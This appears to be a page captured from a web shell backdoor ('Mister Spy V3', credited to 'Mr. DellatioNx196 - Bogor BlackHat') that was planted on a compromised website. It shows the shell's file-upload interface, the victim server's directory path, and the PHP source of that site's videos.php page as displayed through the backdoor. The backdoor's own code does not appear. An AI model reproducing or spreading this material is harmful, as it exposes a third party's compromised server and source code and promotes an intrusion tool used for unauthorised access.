Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/
Upload File :
Current File : /home/caballoscriollos/public_html/web/videos.php

<?php
require_once('inc_library.php');

$Page           = intval($_REQUEST['Page']);
$PageSize       = 12;

$oVideos      = new Videos();
$oPage      = new Page($Page, $PageSize);


$filter = array('Vivo' => '0');

$Paginado   = Pageable::PrintPaginatorFront($oPage, $oVideos->GetCountRows($filter), true);
$arrData    = $oVideos->GetAll($filter, $oPage);

?>
<!DOCTYPE html>
<html lang="en">
    <?php include("ssi_head.php"); ?>
    <body class="custom-cursor">
        <div class="preloader">
            <div class="preloader__image"></div>
        </div>
        <div class="page-wrapper">
            <?php include("ssi_header.php"); ?>

            <!--Page Header End-->
            <div class="stricky-header stricked-menu main-menu main-menu-three">
                <div class="sticky-header__content"></div><!-- /.sticky-header__content -->
            </div><!-- /.stricky-header -->
            <!--Page Header Start-->
            <!-- <section class="page-header">
                <div class="page-header__bg" style="background-image: url(assets/images/backgrounds/page-header-bg.jpg);">
                </div>
                <div class="page-header__shape-1 float-bob-y">
                    <img src="assets/images/shapes/page-header-shape-1.png" alt="">
                </div>
                <div class="page-header__shape-2 float-bob-x">
                    <img src="assets/images/shapes/page-header-shape-2.png" alt="">
                </div>
                <div class="page-header__shape-3 float-bob-y">
                    <img src="assets/images/shapes/page-header-shape-3.png" alt="">
                </div>
                <div class="page-header__shape-4 float-bob-x">
                    <img src="assets/images/shapes/page-header-shape-4.png" alt="">
                </div>
                <div class="container">
                    <div class="page-header__inner">
                        <h2>Contacto</h2>
                        <ul class="thm-breadcrumb list-unstyled">
                            <li><a href="index.php">Home</a></li>
                            <li><span class="icon-down-arrow"></span></li>
                            <li>Contacto</li>
                        </ul>
                    </div>
                </div>
            </section> -->
            <!--Contact Page Start-->
            <?php include('ssi_videos.php'); ?>
            <!--Contact Page End-->
            <?php include("ssi_logos.php"); ?>  
            <?php include("ssi_footer.php"); ?>  

        </div><!-- /.page-wrapper -->
        <?php include("ssi_mobile.php"); ?>  
        <?php include("ssi_search.php"); ?>  
        <a href="#" data-target="html" class="scroll-to-target scroll-to-top"><i class="icon-right-arrow"></i></a>
        <?php include("ssi_scripts.php"); ?>  
        
        <form name="frmData" id="frmData" method="post">
            <input type="hidden" name="Page" id="Page" value="<?=$Page?>" />
        </form>
        <script type="text/javascript">
        
        function SetPage(Page)
        {
            var frmData = document.getElementById('frmData');
    
            if (frmData == undefined)
                return false;

            frmData.Page.value = Page;      
            frmData.submit();
        }
        </script>   
    </body>
</html>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat